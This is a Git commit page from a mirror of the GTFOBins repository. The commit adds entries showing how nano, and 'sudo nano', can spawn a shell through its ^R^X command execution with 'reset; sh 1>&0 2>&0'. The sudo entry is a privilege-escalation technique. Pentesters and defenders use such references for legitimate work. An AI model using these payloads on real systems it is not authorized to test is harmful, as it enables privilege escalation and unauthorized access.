1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00

Add new shell and sudo payload to nano

Thanks to https://twitter.com/TheKnapsy/status/1093137518780854273.
This commit is contained in:
Emilio Pinna 2019-02-15 20:10:32 +00:00
parent 3bd955e8cc
commit 2650be9c68

View File

@ -1,6 +1,10 @@
---
functions:
shell:
- code: |
nano
^R^X
reset; sh 1>&0 2>&0
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: |
TF=$(mktemp)
@ -24,6 +28,10 @@ functions:
./nano -s $TF /etc/hosts
^T
sudo:
- code: |
sudo nano
^R^X
reset; sh 1>&0 2>&0
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: |
TF=$(mktemp)